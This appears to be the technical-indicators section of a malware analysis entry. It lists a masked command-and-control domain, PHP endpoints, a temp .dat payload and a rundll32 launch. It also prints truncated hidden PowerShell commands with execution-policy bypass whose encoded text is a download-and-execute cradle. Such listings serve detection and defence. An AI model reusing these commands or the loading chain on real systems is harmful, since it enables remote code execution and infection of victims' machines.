Technical information
- http://re###tino.top/888g100/index.php
- %TEMP%\qyxptgdr.dat
- 're###tino.top':80
- http://re###tino.top/888g100/main.php
- DNS ASK re###tino.top
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBl...' (with a hidden window)
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBl...
- '<SYSTEM32>\rundll32.exe' %TEMP%\qYxPtGdr.dat f1